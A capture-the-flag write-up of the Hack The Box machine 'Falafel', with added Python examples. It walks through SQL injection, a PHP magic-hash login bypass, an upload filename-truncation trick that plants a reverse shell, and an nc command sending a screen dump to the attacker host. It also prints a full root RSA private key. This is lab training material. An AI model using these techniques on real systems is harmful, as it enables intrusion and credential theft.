Today we are going to solve another CTF challenge, “Falafel”, which is available online for those who want to improve their skills in penetration testing and black-box testing. Falafel is a retired vulnerable machine from Hack The Box, which hosts a collection of vulnerable labs ranging from beginner to expert level so you can practise according to your experience.
Level: Hard
Task: find user.txt & root.txt file on the victim’s machine
Because these labs are hosted online they have a static IP; Falafel's is 10.10.10.73, so let's begin with Nmap port enumeration.
c:\Users\jacco>nmap -sC -sV 10.10.10.73
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-02 14:26 W. Europe Summer Time
Nmap scan report for 10.10.10.73
Host is up (0.030s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
|   256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_  256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.67 seconds
Only SSH (22) and Apache (80) are exposed, and robots.txt disallows /*.txt, which is a hint in itself. Browsing to the target IP presents a login page.
Enumeration
Using the hint from robots.txt, let's brute-force for .txt files that might give us some juicy information:
root@kali:~# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404 -t 60 http://10.10.10.73/FUZZ.txt
********************************************************
* Wfuzz 2.1.5 - The Web Bruteforcer *
********************************************************
Target: http://10.10.10.73/FUZZ.txt
Total requests: 207643
==================================================================
ID Response Lines Word Chars Request
==================================================================
01347: C=200 1 L 4 W 30 Ch "robots"
06064: C=200 17 L 120 W 804 Ch "cyberlaw"
Total time: 2430.657
Processed Requests: 207625
Filtered Requests: 207610
Requests/sec.: 85.41926
Let’s check cyberlaw.txt
The message tells us that there is an admin account, that the site is exposed to takeover through its image upload feature, and it hints at a URL filter on that upload.
Next, we can fuzz the login form for valid usernames. In the first run every guess returns the same 657-word page, so we hide those with --hw 657; what remains are the guesses that produced a different (659-word) response, i.e. a different error message, which confirms admin and chris as valid accounts:
root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --sc 200 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php
********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer                         *
********************************************************
Target: http://10.10.10.73/login.php
Total requests: 8607
==================================================================
ID         Response   Lines    Word     Chars       Payload
==================================================================
000003:  C=200    102 L     657 W     7074 Ch   "Aaron"
000004:  C=200    102 L     657 W     7074 Ch   "Aartjan"
000005:  C=200    102 L     657 W     7074 Ch   "Abagael"
000006:  C=200    102 L     657 W     7074 Ch   "Abagail"
000007:  C=200    102 L     657 W     7074 Ch   "Abahri"
^C
Finishing pending requests...

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --hw 657 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php
********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer                         *
********************************************************
Target: http://10.10.10.73/login.php
Total requests: 8607
==================================================================
ID         Response   Lines    Word     Chars       Payload
==================================================================
000065:  C=200    102 L     659 W     7091 Ch   "Admin"
001488:  C=200    102 L     659 W     7091 Ch   "Chris"
Total time: 37.51125
Processed Requests: 8607
Filtered Requests: 8605
Requests/sec.: 229.4511
The next thing to try is SQL injection. To test for it, we can submit the following string as the username:
' or 1 = 1 --
Exploiting Web Application Vulnerabilities
Then we dig further into the SQL injection with sqlmap. Because the login answers “Wrong identification” only for a valid username, we pass that text with --string so sqlmap can use its presence as the true condition for boolean-based blind injection:
c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" --dbs --batch
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.2.11.19#dev}
|_ -| . [.]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[*] starting @ 14:56:59 /2019-04-02/
--snip--
available databases [2]:
[*] falafel
[*] information_schema

c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables --batch
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.2.11.19#dev}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[*] starting @ 14:59:45 /2019-04-02/
--snip--
back-end DBMS: MySQL 5
[14:59:46] [INFO] fetching tables for database: 'falafel'
[14:59:46] [INFO] fetching number of tables for database 'falafel'
[14:59:46] [INFO] resumed: 1
[14:59:46] [INFO] resumed: users
Database: falafel
[1 table]
+-------+
| users |
+-------+

[*] ending @ 14:59:46 /2019-04-02/

c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.2.11.19#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[*] starting @ 15:01:18 /2019-04-02/
[15:01:18] [INFO] testing connection to the target URL
--snip--
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: falafel
Table: users
[2 entries]
+----+--------+----------+----------------------------------+
| ID | role   | username | password                         |
+----+--------+----------+----------------------------------+
| 1  | admin  | admin    | 0e462096931906507119562988736854 |
| 2  | normal | chris    | d4ee02a22fc872e36d9e3751ba72ddc8 |
+----+--------+----------+----------------------------------+

[*] ending @ 15:01:19 /2019-04-02/
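To make the boolean-based blind technique that sqlmap automated above concrete, here is an added example that is not part of the original writeup. It rebuilds the dumped users table in an in-memory SQLite database, wires a hypothetical injectable login into a true/false oracle keyed on the “Wrong identification” string, and extracts the admin hash one character at a time, which is what sqlmap does behind --string. The login function is a reconstruction (the box's login_logic.php is never shown on this page) and its second reply text is made up; a parameterized version of the same lookup is included to show the oracle going dark.

```python
import sqlite3

# Constructed copy of the dumped `users` table (same rows as the sqlmap output).
USERS = [
    (1, "admin", "admin", "0e462096931906507119562988736854"),
    (2, "normal", "chris", "d4ee02a22fc872e36d9e3751ba72ddc8"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(ID INTEGER, role TEXT, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?)", USERS)
    return con


def vulnerable_login(con, username):
    """Hypothetical injectable login: the username is concatenated into SQL.
    A known user gets "Wrong identification", anything else a different
    message, which is the response difference the wfuzz run exposed."""
    sql = f"SELECT username FROM users WHERE username = '{username}'"
    try:
        row = con.execute(sql).fetchone()
    except sqlite3.Error:            # broken syntax behaves like an unknown user
        row = None
    return "Wrong identification" if row else "Unknown user"   # second string is assumed


def safe_login(con, username):
    """Same lookup with a bound parameter: the input can never alter the query."""
    row = con.execute("SELECT username FROM users WHERE username = ?", (username,)).fetchone()
    return "Wrong identification" if row else "Unknown user"


def make_oracle(login, con, known_user="admin"):
    """Return a function that is True iff the injected condition holds.
    Payload shape: admin' AND (<condition>)--  (the trailing quote is commented out)."""
    def oracle(condition):
        return "Wrong identification" in login(con, f"{known_user}' AND ({condition})-- ")
    return oracle


def blind_extract(oracle, subquery, max_len=64):
    """Boolean-based blind extraction of one string value: binary-search its
    length, then each character's code point. SQLite spellings are used here;
    against MySQL the same logic uses LENGTH()/SUBSTRING()/ASCII()."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(({subquery})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo
    out = []
    for pos in range(1, length + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({subquery}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        out.append(chr(lo))
    return "".join(out)


ADMIN_HASH = "SELECT password FROM users WHERE username = 'admin'"

if __name__ == "__main__":
    db = make_db()
    print("injectable   :", blind_extract(make_oracle(vulnerable_login, db), ADMIN_HASH))
    print("parameterized:", repr(blind_extract(make_oracle(safe_login, db), ADMIN_HASH)))
```

Each character costs about seven requests, so the 32-character hash takes a few hundred requests; with the parameterized login every condition evaluates false, the length search collapses to zero and nothing is recovered.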
As you can see, the password hash for admin starts with 0e. I did not know much about this kind of hash, so I searched and came across “magic hashes”. These are not literal collisions. A digest such as 0e462096931906507119562988736854 is 0e followed only by decimal digits, so PHP's loose comparison (==) treats it as a numeric string and evaluates it as 0 × 10^462096…, which is 0. Any input whose MD5 has the same shape therefore compares equal to it. A well-known example is 240610708, whose MD5 is 0e462097431906509019562988736854: the two digests differ, but both are “zero” to ==. (The 32 characters are hex digits, not bits.) This only works because the application compares hashes with == instead of === or hash_equals().
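The following is an added example, not code from the original writeup, that emulates PHP's loose string comparison in Python so the magic-hash bypass can be checked offline. The numeric-string rule is simplified (surrounding whitespace handling is omitted), and the vulnerable and fixed password checks are assumed shapes of the login code, which the page never shows.

```python
import hashlib
import hmac
import re

# Simplified PHP numeric-string rule: optional sign, digits with optional
# fraction, optional exponent.
_NUMERIC = re.compile(r"^[+-]?(\d+\.?\d*|\.\d+)([eE][+-]?\d+)?$")


def php_loose_equals(a: str, b: str) -> bool:
    """Emulate PHP `==` on two strings: two numeric strings are compared as
    numbers (still the case in PHP 8), everything else byte for byte."""
    if _NUMERIC.match(a) and _NUMERIC.match(b):
        return float(a) == float(b)      # "0e462..." parses as 0 * 10^462... == 0.0
    return a == b


def is_magic(hexdigest: str) -> bool:
    """True when a hex digest is 0e followed only by decimal digits,
    i.e. numeric zero under ==."""
    return re.fullmatch(r"0e\d+", hexdigest) is not None


def md5_hex(s: str) -> str:
    return hashlib.md5(s.encode()).hexdigest()


def check_password_loose(stored_hash: str, candidate: str) -> bool:
    """Assumed vulnerable pattern: `if (md5($password) == $row['password'])`."""
    return php_loose_equals(md5_hex(candidate), stored_hash)


def check_password_strict(stored_hash: str, candidate: str) -> bool:
    """The fix: `hash_equals($row['password'], md5($password))` (or ===),
    a byte-wise, constant-time comparison with no type juggling."""
    return hmac.compare_digest(md5_hex(candidate), stored_hash)


def find_magic_preimage(start: int, stop: int):
    """Brute-force the integers in [start, stop) for one whose MD5 is magic.
    A real search covers hundreds of millions of candidates; 240610708 is the
    classic hit, so a window around it finds one quickly."""
    for n in range(start, stop):
        if is_magic(md5_hex(str(n))):
            return str(n)
    return None


ADMIN_STORED = "0e462096931906507119562988736854"   # the hash dumped above

if __name__ == "__main__":
    print(md5_hex("240610708"))                                # 0e462097431906509019562988736854
    print(check_password_loose(ADMIN_STORED, "240610708"))     # True
    print(check_password_strict(ADMIN_STORED, "240610708"))    # False
```

The same check also flags a stored hash as dangerous before any attack: if is_magic() is true for a value in the database, every magic preimage is a valid password for that account under a loose comparison.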
With the following credentials we log into the admin dashboard and move to the upload option:

Username: admin
Password: 240610708
Here we try to upload a PHP file named shell.php, but it is rejected with the error “Bad extension”.

We then rename it shell.php.png and try again.

This time the file is uploaded successfully into /var/www/html/uploads, so the check only looks at the final extension and we can get PHP code onto the server under a .png name. The catch is that a .png file is served as an image and never executed as PHP, so on its own this is not enough.
Spawning Shell
Let's create a PHP payload to upload to the site.
The PHP file, still carrying the .png extension, is uploaded successfully into /var/www/html/uploads.
Trying very long filenames, I noticed that the web app truncates the filename saved on disk to a maximum of 236 characters, while the extension check runs on the full submitted name. So we can craft a 240-character filename whose last eight characters are “.php.png”: the check sees .png and accepts it, and the truncation drops the final four characters “.png”, leaving a file on disk with a “.php” extension.
Sample filename:
verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png
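The mismatch exploited here is that the value being validated is not the value being stored. The following added example (not code from the original page or the box) models both halves in Python: an upload handler that checks the extension of the submitted name and then saves a truncated name, next to a hardened handler that derives the on-disk name first, validates that exact value, and then discards the client's name entirely. The allow-list and the 236-character limit are assumptions taken from the observations above.

```python
import os
import secrets
from typing import Optional

ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}   # assumed image allow-list
NAME_MAX = 236                                     # on-disk truncation observed on the box


def vulnerable_store(submitted_name: str) -> Optional[str]:
    """Checks the extension of the *submitted* name, then saves a *truncated*
    name, so what was validated is not what lands in uploads/."""
    if os.path.splitext(submitted_name)[1].lower() not in ALLOWED_EXT:
        return None                      # "Bad extension"
    return submitted_name[:NAME_MAX]     # the name actually written to disk


def hardened_store(submitted_name: str) -> Optional[str]:
    """Derive the on-disk name first and validate that exact value; reject
    double extensions; then replace the client's name with a random one that
    carries a single allow-listed extension. Truncation can no longer change
    the extension, and nothing the client chose reaches the filesystem."""
    on_disk = os.path.basename(submitted_name)[:NAME_MAX]
    stem, ext = os.path.splitext(on_disk)
    if ext.lower() not in ALLOWED_EXT or "." in stem:
        return None
    return secrets.token_hex(8) + ext.lower()


def craft_name(total_len: int = 240, suffix: str = ".php.png") -> str:
    """Build the attack name: padded so that cutting to NAME_MAX removes exactly '.png'."""
    return "a" * (total_len - len(suffix)) + suffix


if __name__ == "__main__":
    name = craft_name()
    print(len(name), "->", vulnerable_store(name)[-12:])   # 240 -> aaaaaaaa.php
    print("hardened:", hardened_store(name))               # None
```

Generating the stored name server-side is the important part: checking the final name is necessary, but a random name also removes path traversal, overwrites of existing uploads and any dependence on how the filesystem or a downloader shortens long names.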
The upload form takes a URL and the server fetches the file itself, so we prepare a PHP reverse shell with the long filename and host it with Python's SimpleHTTPServer. The target fetching it confirms the flow:
root@kali:~/htb/falafel# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.73 - - [02/Apr/2019 10:10:20] "GET /verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png HTTP/1.1" 200 -
Triggering the reverse shell via curl:
root@kali:~/htb/falafel# curl "http://10.10.10.73/uploads/0402-1710_61cb5b7a8480bfc4/verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php"
Netcat listener receiving the reverse shell connection:
root@kali:~/htb/falafel# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.73.
Ncat: Connection from 10.10.10.73:53576.
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 17:14:07 up 1 day, 16:59,  2 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
yossi    tty1                      Mon00   40:59m  0.15s  0.09s -bash
moshe    pts/0    10.10.14.20      15:21    1:52m  0.00s  0.00s -sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')"
www-data@falafel:/$
Looking at /etc/passwd, a grep for bash shows yossi; moshe, whose login shell is sh rather than bash, was already visible in the w output above. So there are two system users of interest, yossi and moshe.
www-data@falafel:/$ cat /etc/passwd | grep bash
root:x:0:0:root:/root:/bin/bash
postgres:x:111:116:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
yossi:x:1000:1000:Yossi,,,:/home/yossi:/bin/bash
www-data@falafel:/$
www-data@falafel:/$ cd /var/www/html
www-data@falafel:/var/www/html$ ls
assets  authorized.php  connection.php  css  cyberlaw.txt  footer.php  header.php  icon.png  images  index.php  js  login.php  login_logic.php  logout.php  profile.php  robots.txt  style.php  upload.php  uploads
www-data@falafel:/var/www/html$ cat connection.php
<?php
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
// Check connection
if (mysqli_connect_errno()) {
    echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
www-data@falafel:/var/www/html$
This is the web application's database connection file: it connects to MySQL as user moshe with the password falafelIsReallyTasty.
Since moshe is also a system user, we try that password over SSH. It works (password reuse between the database and the OS account), and user.txt is in /home/moshe:
PS C:\Users\jacco> ssh moshe@10.10.10.73
moshe@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Tue Apr  2 15:21:50 2019 from 10.10.14.20
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
setterm: terminal xterm-256color does not support --blank
moshe@falafel:~$ ls
user.txt
moshe@falafel:~$ cat user.txt
c86*****9d3
Enumerating further, we checked moshe's groups and found that he is a member of video. That group grants read access to the framebuffer devices (/dev/fb*), which hold the raw pixels of whatever is currently drawn on the physical console, and the w output earlier showed yossi logged in on tty1. A local user in video can therefore read another user's screen, which can leak secrets and lead to privilege escalation.
Let's dump /dev/fb0 with cat into /tmp as screen.raw and send it to the attacking machine (with a listener there writing it to a file, e.g. nc -lvp 5555 > screen.raw):
groups
cat /dev/fb0 > /tmp/screen.raw
cd /tmp
ls
nc 10.10.14.25 5555 < screen.raw
Now that we have the raw dump, we need to convert it to a standard image format such as .png. Before that we need the screen dimensions; the following command prints them as width,height in pixels:
cat /sys/class/graphics/fb0/virtual_size
Now run the following to convert the raw data into a .png image (iraw2png.pl is a small Perl script that reads raw framebuffer pixels from stdin and writes a PNG of the given width and height, here the 1176 and 885 read above):
./iraw2png.pl 1176 885 < screen.raw > screen.png
Opening screen.png shows yossi's console session, and in it the password MoshePlzStopHackingMe! for user yossi.
With that credential we SSH in as yossi. His groups include disk, which gives read access to the raw block device, so debugfs on /dev/sda1 can read any file on the filesystem regardless of its permissions, including root's SSH private key and root.txt:
PS C:\Users\jacco> ssh yossi@10.10.10.73
yossi@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.

Last login: Tue Apr  2 15:16:20 2019 from 10.10.14.20
yossi@falafel:~$ groups
yossi adm disk cdrom dip plugdev lpadmin sambashare
yossi@falafel:~$ debugfs /dev/sda1
debugfs 1.42.13 (17-May-2015)
debugfs:  cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAyPdlQuyVr/L4xXiDVK8lTn88k4zVEEfiRVQ1AWxQPOHY7q0h
b+Zd6WPVczObUnC+TaElpDXhf3gjLvjXvn7qGuZekNdB1aoWt5IKT90yz9vUx/gf
v22+b8XdCdzyXpJW0fAmEN+m5DAETxHDzPdNfpswwYpDX0gqLCZIuMC7Z8D8Wpkg
BWQ5RfpdFDWvIexRDfwj/Dx+tiIPGcYtkpQ/UihaDgF0gwj912Zc1N5+0sILX/Qd
UQ+ZywP/qj1FI+ki/kJcYsW/5JZcG20xS0QgNvUBGpr+MGh2urh4angLcqu5b/ZV
dmoHaOx/UOrNywkp486/SQtn30Er7SlM29/8PQIDAQABAoIBAQCGd5qmw/yIZU/1
eWSOpj6VHmee5q2tnhuVffmVgS7S/d8UHH3yDLcrseQhmBdGey+qa7fu/ypqCy2n
gVOCIBNuelQuIAnp+EwI+kuyEnSsRhBC2RANG1ZAHal/rvnxM4OqJ0ChK7TUnBhV
+7IClDqjCx39chEQUQ3+yoMAM91xVqztgWvl85Hh22IQgFnIu/ghav8Iqps/tuZ0
/YE1+vOouJPD894UEUH5+Bj+EvBJ8+pyXUCt7FQiidWQbSlfNLUWNdlBpwabk6Td
OnO+rf/vtYg+RQC+Y7zUpyLONYP+9S6WvJ/lqszXrYKRtlQg+8Pf7yhcOz/n7G08
kta/3DH1AoGBAO0itIeAiaeXTw5dmdza5xIDsx/c3DU+yi+6hDnV1KMTe3zK/yjG
UBLnBo6FpAJr0w0XNALbnm2RToX7OfqpVeQsAsHZTSfmo4fbQMY7nWMvSuXZV3lG
ahkTSKUnpk2/EVRQriFjlXuvBoBh0qLVhZIKqZBaavU6iaplPVz72VvLAoGBANj0
GcJ34ozu/XuhlXNVlm5ZQqHxHkiZrOU9aM7umQkGeM9vNFOwWYl6l9g4qMq7ArMr
5SmT+XoWQtK9dSHVNXr4XWRaH6aow/oazY05W/BgXRMxolVSHdNE23xuX9dlwMPB
f/y3ZeVpbREroPOx9rZpYiE76W1gZ67H6TV0HJcXAoGBAOdgCnd/8lAkcY2ZxIva
xsUr+PWo4O/O8SY6vdNUkWIAm2e7BdX6EZ0v75TWTp3SKR5HuobjVKSht9VAuGSc
HuNAEfykkwTQpFTlmEETX9CsD09PjmsVSmZnC2Wh10FaoYT8J7sKWItSzmwrhoM9
BVPmtWXU4zGdST+KAqKcVYubAoGAHR5GBs/IXFoHM3ywblZiZlUcmFegVOYrSmk/
k+Z6K7fupwip4UGeAtGtZ5vTK8KFzj5p93ag2T37ogVDn1LaZrLG9h0Sem/UPdEz
HW1BZbXJSDY1L3ZiAmUPgFfgDSze/mcOIoEK8AuCU/ejFpIgJsNmJEfCQKfbwp2a
M05uN+kCgYBq8iNfzNHK3qY+iaQNISQ657Qz0sPoMrzQ6gAmTNjNfWpU8tEHqrCP
NZTQDYCA31J/gKIl2BT8+ywQL50avvbxcXZEsy14ExVnaTpPQ9m2INlxz97YLxjZ
FEUbkAlzcvN/S3LJiFbnkQ7uJ0nPj4oPw1XBcmsQoBwPFOcCEvHSrg==
-----END RSA PRIVATE KEY-----
debugfs:  cat /root/root.txt
23b*****fa1
debugfs: